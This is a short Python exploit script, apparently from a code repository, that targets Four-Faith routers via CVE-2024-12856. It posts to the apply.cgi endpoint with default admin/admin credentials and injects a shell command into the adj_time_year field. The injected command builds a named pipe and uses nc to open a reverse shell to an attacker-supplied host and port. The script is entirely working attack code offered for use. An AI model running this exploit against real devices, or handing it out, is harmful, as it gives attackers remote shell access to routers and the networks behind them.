README.md
Rendering markdown...
import requests
from requests.auth import HTTPBasicAuth
import argparse
def make_request(ip, lhost, lport, user, password, rport):
url = "http://{IP}:{PORT}/apply.cgi".format(IP = ip, PORT = rport)
data = {
"adj_time_sec": "32",
"change_action": "gozila_cgi",
"adj_time_day": "27",
"adj_time_mon": "10",
"adj_time_hour": "11",
"adj_time_year": "$(cd /tmp/; mknod bOY p;cat bOY|/bin/sh -i 2>&1|nc {IP} {PORT} >bOY; rm bOY;)".format(IP=lhost, PORT = lport),
"adj_time_min": "35",
"submit_button": "index",
"action": "Save",
"submit_type": "adjust_sys_time",
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36", # feel free to change it
"Content-Type": "application/x-www-form-urlencoded",
"Accept-Encoding": "gzip",
}
auth = HTTPBasicAuth(user, password)
try:
requests.post(url, headers=headers, data=data, auth=auth)
except Exception as e:
print(e)
print("Wrong credentials")
def main():
parser = argparse.ArgumentParser(description="Exploit for CVE-2024-12856 to get a reverse shell to Four-Faith routers")
# Mandatory arguments
parser.add_argument("RHOST", help="The remote IP address. Also accepts domains")
parser.add_argument("LHOST", help="The local IP for reverse shell")
parser.add_argument("LPORT", help="The local port")
# Optional arguments
parser.add_argument("-u", "--username", default="admin", help="Username for authentication (default: admin)")
parser.add_argument("-p", "--password", default="admin", help="Password for authentication (default: admin)")
parser.add_argument("-rport", "--remote_port", default=80, help="Remote port (default: 80)")
args = parser.parse_args()
ip = args.RHOST
lhost = args.LHOST
lport = args.LPORT
user = args.username
password = args.password
rport = args.remote_port
make_request(ip, lhost, lport, user, password, rport)
if __name__ == "__main__":
main()